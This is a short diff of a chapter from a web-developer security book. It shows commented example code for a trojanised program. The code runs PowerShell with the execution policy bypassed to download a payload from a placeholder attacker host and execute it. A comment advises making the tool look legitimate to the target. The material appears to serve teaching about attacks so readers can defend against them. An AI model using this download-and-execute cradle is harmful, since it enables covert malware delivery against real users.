binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

       // Set executionpolicy to bypass will enable script execution for this session, telling PS
       // to trust that you know what you are doing in downloading -> running scripts.
       // Invoke the EXpression: download the payload and execute it.
-      // Providing the payload does not trigger anti-virus, this should not. system("powershell.exe -noprofile -executionpolicy bypass \"IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))\"");
+      // Providing the payload does not trigger Anti-Virus, this should not. system("powershell.exe -noprofile -executionpolicy bypass \"IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/payload.txt '))\"");

       // Add content here to make your target think this is a legitimate helpful tool.